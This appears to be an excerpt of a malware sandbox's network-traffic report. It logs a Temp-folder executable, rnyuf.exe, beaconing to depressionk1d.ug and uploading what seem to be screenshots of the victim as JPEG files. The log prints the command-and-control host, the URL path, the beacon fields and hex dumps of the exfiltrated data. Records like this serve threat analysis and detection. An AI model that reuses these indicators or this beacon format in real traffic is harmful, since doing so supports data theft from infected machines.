                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:23:58.865799904 CET8851INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:58 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          197192.168.2.449984178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:23:59.006320000 CET8865OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:23:59.033370972 CET8904INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:59 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          198192.168.2.449985178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:23:59.007424116 CET8865OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                          Content-Type: multipart/form-data; boundary=----8ce385891442aafcc84e0cf96686219e
                          Host: depressionk1d.ug
                          Content-Length: 110494
                          Cache-Control: no-cache
                          Nov 12, 2021 22:23:59.007577896 CET8865OUTData Raw: 2d 2d 2d 2d 2d 2d 38 63 65 33 38 35 38 39 31 34 34 32 61 61 66 63 63 38 34 65 30 63 66 39 36 36 38 36 32 31 39 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                          Data Ascii: ------8ce385891442aafcc84e0cf96686219eContent-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                          Nov 12, 2021 22:23:59.007826090 CET8875OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                          Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                          Nov 12, 2021 22:23:59.008116961 CET8878OUTData Raw: c9 35 0e b5 35 bb 21 ce 2b a9 95 45 49 34 7e 54 f2 47 9c ec 62 b9 f5 c5 47 5a 27 72 82 8a 5a 28 01 28 a5 a2 80 12 96 97 14 62 80 12 8a 5a 3b d0 02 51 4b 45 31 06 28 a0 52 d1 60 12 8a 5a 50 29 88 4c 52 d1 8a 0d 00 14 51 8a 5a 00 4c 51 8a 5c 51 8a
                          Data Ascii: 55!+EI4~TGbGZ'rZ((bZ;QKE1(R`ZP)LRQZLQ\QaqR@%((4QJ)h1@KEc4SbF(\e.=iamR,.(cq.)hIv(Qv))X.'4sF(Z9ME4\PE6Z)XbQKE%Q`REJ)iCI
                          Nov 12, 2021 22:23:59.030884981 CET8886OUTData Raw: 42 41 c1 e0 f2 2b ca a9 1e 6a 95 17 9a fc 91 ee aa 9e ce 96 1e 76 4e d1 7b ff 00 8e 64 1a 07 87 e1 d2 2d 33 2a c7 2d ec 8c 64 9a 6c 64 ee 3d 81 3c e0 74 1f 9d 2d c7 85 f4 bb 99 fc c6 8a 55 46 90 48 f0 47 33 2c 4e c3 9c b2 03 82 6b 8a 3a ff 00 88
                          Data Ascii: BA+jvN{d-3*-dld=<t-UFHG3,Nk:,v\]Gw$V5g]/'7mB&f\c/gr34"NlbI?Z"0Lt?EWqQ@%PRS(J3@Q
                          Nov 12, 2021 22:23:59.030931950 CET8892OUTData Raw: 4a 00 43 4c 27 34 e2 73 4d a4 c6 86 56 cf 86 7f e4 25 27 fd 71 3f cc 56 2d 6d 78 67 fe 42 52 7f d7 13 fc c5 6b 85 fe 34 4c b1 7f c1 91 d5 d6 ff 00 87 3c 21 a9 f8 96 4d d6 c8 23 b6 53 87 b8 93 ee 83 e8 3d 4d 65 e9 96 2f a9 ea 96 d6 48 42 99 a4 09
                          Data Ascii: JCL'4sMV%'q?V-mxgBRk4L<!M#S=Me/HBQ=uG1PimFU'j^7:Q=pXxUwek->uBHwh-$c>*%K+ l=1^Khh.Fz5Zu$(bi
                          Nov 12, 2021 22:23:59.030989885 CET8895OUTData Raw: 55 6d 3a 39 6d 6d 34 c3 76 3c 3b 2c e8 f7 b1 c1 e5 f9 a2 f8 a6 f6 33 7c 99 db f2 e5 bb 71 5c 6d dd e5 c5 fd c9 b8 b9 31 6f 20 28 58 a1 48 91 40 ec 11 00 55 1f 41 4f 1a 96 a2 b6 e6 d9 6e b1 01 b5 36 65 3c b5 ff 00 52 64 f3 4a e7 19 fb fc e7 af 6c
                          Data Ascii: Um:9mm4v<;,3|q\m1o (XH@UAOn6e<RdJl$heJZ.'<-'aU[*S,07EWu.~PskKm\y$/4I(6%f\tw7Vr[bi#@xl z-$Ke8K.#$dT
                          Nov 12, 2021 22:23:59.031023026 CET8899OUTData Raw: 7d a9 0a 66 a7 90 6a a1 9e d1 54 46 2a d3 68 b3 51 18 aa 5d 33 48 d5 33 4c 75 1b 47 c5 69 34 35 13 43 58 ca 99 b4 6a 99 6f 15 40 d1 d6 a3 c5 50 3c 55 cf 3a 67 44 2a 99 a5 71 4c 2b 57 9e 2a 81 d2 b0 94 2c 74 46 77 2a 91 4d c5 4e 56 98 56 b3 71 34
                          Data Ascii: }fjTF*hQ]3H3LuGi45CXjo@P<U:gD*qL+W*,tFw*MNVVq4R#HE&*lUc~)Q`JQI\@($2iZm.+"o7;0ROfT(%(p vi)(!L\PzR8\hC@cMa(sQN,Uzm]GCd@S*t+\
                          Nov 12, 2021 22:23:59.031033993 CET8900OUTData Raw: e4 77 a7 cd 17 ba 17 2c 96 cc b2 74 b8 4f 47 a6 9d 20 ff 00 0b d3 04 cc 3b d3 d6 e1 c7 43 4e d4 df 41 5e aa ea 44 74 a9 87 4c 1a 89 b4 fb 85 3f 70 d5 f1 76 e3 bd 4a 97 8d de 8f 67 49 ec 1e d6 aa 32 4d ac c3 f8 0f e5 4d 31 38 ea a6 b7 85 da 9e ab
                          Data Ascii: w,tOG ;CNA^DtL?pvJgI2MM18NobvZ?-4Z?A_V}}j=Qvm*[?%')biHm&QQ:u)}JXV>~T)F1Shaq8p+IpH%:S AO
                          Nov 12, 2021 22:23:59.031045914 CET8904OUTData Raw: 1d c8 50 67 31 ec 90 15 65 23 95 c0 3f 74 0e 46 7d eb 95 8f 52 bf 8a dd ed e3 bd b9 48 5d 76 bc 6b 2b 05 61 e8 46 70 45 74 47 0d 2b dd b2 25 88 8d ac 91 56 92 8a 2b b4 e4 14 51 45 14 c0 2b e9 3f 83 cc bf f0 85 6d c8 dc 26 04 8f 63 1a 7f 81 af 9b
                          Data Ascii: Pg1e#?tF}RH]vk+aFpEtG+%V+QE+?m&c+oK>\Xr;+c*G:5)vRK[_f}+/5KHlb}(z9rZa{6>(Ucw5<OAK')uU+/ts`
                          Nov 12, 2021 22:23:59.054076910 CET8907OUTData Raw: 9a 70 aa 44 b1 f4 52 52 d5 12 38 53 81 a6 0a 75 52 25 a2 50 78 a7 e6 a2 06 9c 0d 5a 64 34 48 0d 3c 1a 88 1e 69 cb 56 99 0d 13 03 4f 06 a1 14 fc d5 a6 66 d1 26 68 06 99 9a 50 6a ae 2b 12 06 a7 87 a8 41 a7 83 4d 32 5a 25 0f ef 4f 0f 50 03 4a 0d 51
                          Data Ascii: pDRR8SuR%PxZd4H<iVOf&hPj+AM2Z%OPJQ%!ETPjpErrMS;u#<zNJy^]67N*h+IlFf!Ua9T]H4k*zp)U4aD{STQ{8VHma=8/lNt.8
                          Nov 12, 2021 22:23:59.103496075 CET8979INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:59 GMT
                          Content-Type: text/html
                          Content-Length: 0
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          X-Powered-By: PHP/5.6.37
                          Nov 12, 2021 22:23:59.142946959 CET9008OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:23:59.168920994 CET9008INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:59 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          199192.168.2.449986178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:23:59.314810038 CET9034OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:23:59.340184927 CET9035INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:59 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          2192.168.2.449782178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:23:06.731543064 CET1039OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:23:06.754194975 CET1041INHTTP/1.1 503 Service Temporarily Unavailable
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:06 GMT
                          Content-Type: text/html
                          Content-Length: 1230
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          ETag: "5a4b7cd2-4ce"
                          Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 74 69 74 6c 65 3e 35 30 33 20 53 65 72 76 69 63 65 20 54 65 6d 70 6f 72 61 72 69 6c 79 20 55 6e 61 76 61 69 6c 61 62 6c 65 20 2d 20 d1 eb f3 e6 e1 e0 20 e2 f0 e5 ec e5 ed ed ee 20 ed e5 e4 ee f1 f2 f3 ef ed e0 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 31 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 66 61 76 69 63 6f 6e 35 35 33 36 66 63 39 33 34 33 65 39 61 62 30 61 63 61 30 37 31 33 35 34 30 38 34 64 64 33 63 63 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 66 61 76 69 63 6f 6e 35 35 33 36 66 63 39 33 34 33 65 39 61 62 30 61 63 61 30 37 31 33 35 34 30 38 34 64 64 33 63 63 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 3e 0a 3c 63 65 6e 74 65 72 3e 0a 3c 48 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 54 65 6d 70 6f 72 61 72 69 6c 79 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 62 72 3e d1 eb f3 e6 e1 e0 20 e2 f0 e5 ec e5 ed ed ee 20 ed e5 e4 ee f1 f2 f3 ef ed e0 3c 2f 48 31 3e 0a 3c 2f 42 4f 44 59 3e 0a 3c 2f 48 54 4d 4c 3e 0a 3c 21 2d 2d 0a 20 20 20 2d 20 55 6e 66 6f 72 74 75 6e 61 74 65 6c 79 2c 20 4d 69 63 72 6f 73 6f 66 74 20 68 61 73 20 61 64 64 65 64 20 61 20 63 6c 65 76 65 72 20 6e 65 77 0a 20 20 20 2d 20 22 66 65 61 74 75 72 65 22 20 74 6f 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 2e 20 49 66 20 74 68 65 20 74 65 78 74 20 6f 66 0a 20 20 20 2d 20 61 6e 20 65 72 72 6f 72 27 73 20 6d 65 73 73 61 67 65 20 69 73 20 22 74 6f 6f 20 73 6d 61 6c 6c 22 2c 20 73 70 65 63 69 66 69 63 61 6c 6c 79 0a 20 20 20 2d 20 6c 65 73 73 20 74 68 61 6e 20 35 31 32 20 62 79 74 65 73 2c 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 20 72 65 74 75 72 6e 73 0a 20 20 20 2d 20 69 74 73 20 6f 77 6e 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 2e 20 59 6f 75 20 63 61 6e 20 74 75 72 6e 20 74 68 61 74 20 6f 66 66 2c 0a 20 20 20 2d 20 62 75 74 20 69 74 27 73 20 70 72 65 74 74 79 20 74 72 69 63 6b 79 20 74 6f 20 66 69 6e 64 20 73 77 69 74 63 68 20 63 61 6c 6c 65 64 0a 20 20 20 2d 20 22 73 6d 61 72 74 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 73 22 2e 20 54 68 61 74 20 6d 65 61 6e 73 2c 20 6f 66 20 63 6f 75 72 73 65 2c 0a 20 20 20 2d 20 74 68 61 74 20 73 68 6f 72 74 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 73 20 61 72 65 20 63 65 6e 73 6f 72 65 64 20 62 79 20 64 65 66 61 75 6c 74 2e 0a 20 20 20 2d 20 49 49 53 20 61 6c 77 61 79 73 20 72 65 74 75 72 6e 73 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 73 20 74 68 61 74 20 61 72 65 20 6c 6f 6e 67 0a 20 20 20 2d 20 65 6e 6f 75 67 68 20 74 6f 20 6d 61 6b 65 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 20 68 61 70 70 79 2e 20 54 68 65 0a 20 20 20 2d 20 77 6f 72 6b 61 72 6f 75 6e 64 20 69 73 20 70 72 65 74 74 79 20 73 69 6d 70 6c 65 3a 20 70 61 64 20 74 68 65 20 65 72 72 6f 72 0a 20 20 20 2d 20 6d 65 73 73 61 67 65 20 77 69 74 68 20 61 20 62 69 67 20 63 6f 6d 6d 65 6e 74 20 6c 69 6b 65 20 74 68 69 73 20 74 6f 20 70 75 73 68 20 69 74 0a 20 20 20 2d 20 6f 76 65 72 20 74 68 65 20 66 69 76 65 20
                          Data Ascii: <HTML><HEAD><title>503 Service Temporarily Unavailable - </title><meta http-equiv="Content-Type" content="text/html; charset=windows-1251"><link rel="icon" href="/favicon5536fc9343e9ab0aca071354084dd3cc.ico" type="image/x-icon" /><link rel="shortcut icon" href="/favicon5536fc9343e9ab0aca071354084dd3cc.ico" type="image/x-icon" /></HEAD><BODY><center><H1>503 Service Temporarily Unavailable<br> </H1></BODY></HTML>... - Unfortunately, Microsoft has added a clever new - "feature" to Internet Explorer. If the text of - an error's message is "too small", specifically - less than 512 bytes, Internet Explorer returns - its own error message. You can turn that off, - but it's pretty tricky to find switch called - "smart error messages". That means, of course, - that short error messages are censored by default. - IIS always returns error messages that are long - enough to make Internet Explorer happy. The - workaround is pretty simple: pad the error - message with a big comment like this to push it - over the five
                          Nov 12, 2021 22:23:06.754216909 CET1041INData Raw: 68 75 6e 64 72 65 64 20 61 6e 64 20 74 77 65 6c 76 65 20 62 79 74 65 73 20 6d 69 6e 69 6d 75 6d 2e 0a 20 20 20 2d 20 4f 66 20 63 6f 75 72 73 65 2c 20 74 68 61 74 27 73 20 65 78 61 63 74 6c 79 20 77 68 61 74 20 79 6f 75 27 72 65 20 72 65 61 64 69
                          Data Ascii: hundred and twelve bytes minimum. - Of course, that's exactly what you're reading - right now. -->
                          Nov 12, 2021 22:23:06.790941000 CET1041OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                          Content-Type: multipart/form-data; boundary=----db1a118290543eba3f3170fd42f2b8f5
                          Host: depressionk1d.ug
                          Content-Length: 106671
                          Cache-Control: no-cache
                          Nov 12, 2021 22:23:06.791172028 CET1041OUTData Raw: 2d 2d 2d 2d 2d 2d 64 62 31 61 31 31 38 32 39 30 35 34 33 65 62 61 33 66 33 31 37 30 66 64 34 32 66 32 62 38 66 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                          Data Ascii: ------db1a118290543eba3f3170fd42f2b8f5Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                          Nov 12, 2021 22:23:06.791368961 CET1051OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                          Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                          Nov 12, 2021 22:23:06.791465998 CET1054OUTData Raw: c9 35 0e b5 35 bb 21 ce 2b a9 95 45 49 34 7e 54 f2 47 9c ec 62 b9 f5 c5 47 5a 27 72 82 8a 5a 28 01 28 a5 a2 80 12 96 97 14 62 80 12 8a 5a 3b d0 02 51 4b 45 31 06 28 a0 52 d1 60 12 8a 5a 50 29 88 4c 52 d1 8a 0d 00 14 51 8a 5a 00 4c 51 8a 5c 51 8a
                          Data Ascii: 55!+EI4~TGbGZ'rZ((bZ;QKE1(R`ZP)LRQZLQ\QaqR@%((4QJ)h1@KEc4SbF(\e.=iamR,.(cq.)hIv(Qv))X.'4sF(Z9ME4\PE6Z)XbQKE%Q`REJ)iCI
                          Nov 12, 2021 22:23:06.813813925 CET1065OUTData Raw: 42 41 c1 e0 f2 2b ca a9 1e 6a 95 17 9a fc 91 ee aa 9e ce 96 1e 76 4e d1 7b ff 00 8e 64 1a 07 87 e1 d2 2d 33 2a c7 2d ec 8c 64 9a 6c 64 ee 3d 81 3c e0 74 1f 9d 2d c7 85 f4 bb 99 fc c6 8a 55 46 90 48 f0 47 33 2c 4e c3 9c b2 03 82 6b 8a 3a ff 00 88
                          Data Ascii: BA+jvN{d-3*-dld=<t-UFHG3,Nk:,v\]Gw$V5g]/'7mB&f\c/gr34"NlbI?Z"0Lt?EWqQ@%PRS(J3@Q
                          Nov 12, 2021 22:23:06.813874006 CET1075OUTData Raw: 8a 5a 5c 53 24 4c 52 81 4a 05 2e 29 89 b1 b4 62 9f 8a 31 45 85 71 98 a5 c5 3b 14 b8 a7 60 b8 dc 51 b6 9f 8a 5c 53 b0 ae 33 6d 1b 6a 4d b4 6d a7 61 73 11 ed a3 6d 4b 8a 36 d1 ca 1c c4 3b 28 2b 53 ed a4 db 4f 94 39 88 0a d3 4a d5 82 b4 85 2a 79 46
                          Data Ascii: Z\S$LRJ.)b1Eq;`Q\S3mjMmasmK6;(+SO9J*yFV+M)VJJTVI)HVV+L)RZ9ZiiSL"""RM"&0LSIRUE!PwE!Ph7CJ*|lx_BJ:5i1|xss7RM
                          Nov 12, 2021 22:23:06.813898087 CET1081OUTData Raw: 1d c8 50 67 31 ec 90 15 65 23 95 c0 3f 74 0e 46 7d eb 95 8f 52 bf 8a dd ed e3 bd b9 48 5d 76 bc 6b 2b 05 61 e8 46 70 45 74 47 0d 2b dd b2 25 88 8d ac 91 56 92 8a 2b b4 e4 14 51 45 14 c0 2b e9 3f 83 cc bf f0 85 6d c8 dc 26 04 8f 63 1a 7f 81 af 9b
                          Data Ascii: Pg1e#?tF}RH]vk+aFpEtG+%V+QE+?m&c+oK>\Xr;+c*G:5)vRK[_f}+/5KHlb}(z9rZa{6>(Ucw5<OAK')uU+/ts`
                          Nov 12, 2021 22:23:06.836441994 CET1091OUTData Raw: 83 14 62 81 45 30 b8 53 85 36 94 1a 04 28 eb 4e 1d e9 b4 b4 d0 85 a2 8a 5a 64 8b 8a 4c 52 81 4a 06 29 d8 06 e2 8a 53 49 40 20 a2 92 8a 40 14 b4 52 1a 00 5a 51 40 a2 98 0b 4b 49 4a 29 88 5a 33 49 45 08 43 b3 40 eb 40 a3 35 40 3a 8a 6e 68 14 13 61
                          Data Ascii: bE0S6(NZdLRJ)SI@ @RZQ@KIJ)Z3IEC@@5@:nhaii(0RRZJZhLS@C:)BSiEQ,uQNuQ#<*1OH<RMU:uM~itj-f8dvjM3N8h<8isLlJ8Pi.h0Pib@iA
                          Nov 12, 2021 22:23:06.836507082 CET1102OUTData Raw: a4 20 a2 92 8a 00 70 3c 62 83 48 3a d2 9a 77 01 28 a5 e9 45 00 02 96 92 96 81 31 69 28 a2 98 87 0a 5a 41 4b 4c 1e e1 4b 8a 4a 5a 62 02 29 3b d2 d2 1a 00 05 38 50 28 a0 40 29 c2 9a 69 45 50 98 ea 28 a5 1d 69 88 51 4a 28 14 b4 d1 22 af a5 29 18 a4
                          Data Ascii: p<bH:w(E1i(ZAKLKJZb);8P(@)iEP(iQJ(")ykbDE XC8SH*,()Bbu'Zx6\bLB)vRBQIR`$xQjRZh+Tbc|*LQVfKLRF(xN)Mpd=))H(
                          Nov 12, 2021 22:23:06.836538076 CET1112OUTData Raw: a8 66 88 72 f5 a7 e6 9a 29 d5 0c d1 0f 53 c5 79 17 c4 f0 16 f2 c7 1f f3 cd ff 00 f4 2a f5 b1 d4 d7 91 fc 4e 3f e9 d6 3f f5 c9 bf f4 2a d2 87 c4 45 53 c7 5a 35 63 92 29 04 29 e9 52 62 94 57 2f 2a 3d 2e 66 33 ca 5e 3d a9 db 17 76 71 cd 2d 19 a7 64
                          Data Ascii: fr)Sy*N??*ESZ5c))RbW/*=.f3^=vq-dbhN!] @7n4Z9P(t0hVBJ!@sE93Ri)c<Dx*J)rc1(nqO ``PFFHD~D#KIF=*c4yIOvBx
                          Nov 12, 2021 22:23:06.836605072 CET1118OUTData Raw: 6a 64 f3 0c c5 2e 2a 50 86 94 25 04 f3 11 81 4f 02 9e 14 53 c0 5a 64 b9 11 85 a7 84 a7 82 a3 bd 1e 6a 0f e2 14 10 db 62 04 a7 04 a6 9b 98 87 f1 52 7d b6 31 d3 9a 77 42 e5 9b e8 4c 12 94 25 56 37 cb d8 53 7e da 4f 41 45 c3 d9 cc bd b7 14 a0 56 7f
                          Data Ascii: jd.*P%OSZdjbR}1wBL%V7S~OAEVD+RQVW1=w}ExURQa{"h[sFM7w9J~7xqBhh$\kc%5X5.w/YsFr-IM}b]\G
                          Nov 12, 2021 22:23:06.884496927 CET1148INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:06 GMT
                          Content-Type: text/html
                          Content-Length: 0
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          X-Powered-By: PHP/5.6.37


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          20192.168.2.449802178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:23:19.559016943 CET2541OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                          Content-Type: multipart/form-data; boundary=----db1a118290543eba3f3170fd42f2b8f5
                          Host: depressionk1d.ug
                          Content-Length: 106671
                          Cache-Control: no-cache
                          Nov 12, 2021 22:23:19.559117079 CET2542OUTData Raw: 2d 2d 2d 2d 2d 2d 64 62 31 61 31 31 38 32 39 30 35 34 33 65 62 61 33 66 33 31 37 30 66 64 34 32 66 32 62 38 66 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                          Data Ascii: ------db1a118290543eba3f3170fd42f2b8f5Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                          Nov 12, 2021 22:23:19.559290886 CET2552OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                          Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                          Nov 12, 2021 22:23:19.559438944 CET2554OUTData Raw: c9 35 0e b5 35 bb 21 ce 2b a9 95 45 49 34 7e 54 f2 47 9c ec 62 b9 f5 c5 47 5a 27 72 82 8a 5a 28 01 28 a5 a2 80 12 96 97 14 62 80 12 8a 5a 3b d0 02 51 4b 45 31 06 28 a0 52 d1 60 12 8a 5a 50 29 88 4c 52 d1 8a 0d 00 14 51 8a 5a 00 4c 51 8a 5c 51 8a
                          Data Ascii: 55!+EI4~TGbGZ'rZ((bZ;QKE1(R`ZP)LRQZLQ\QaqR@%((4QJ)h1@KEc4SbF(\e.=iamR,.(cq.)hIv(Qv))X.'4sF(Z9ME4\PE6Z)XbQKE%Q`REJ)iCI
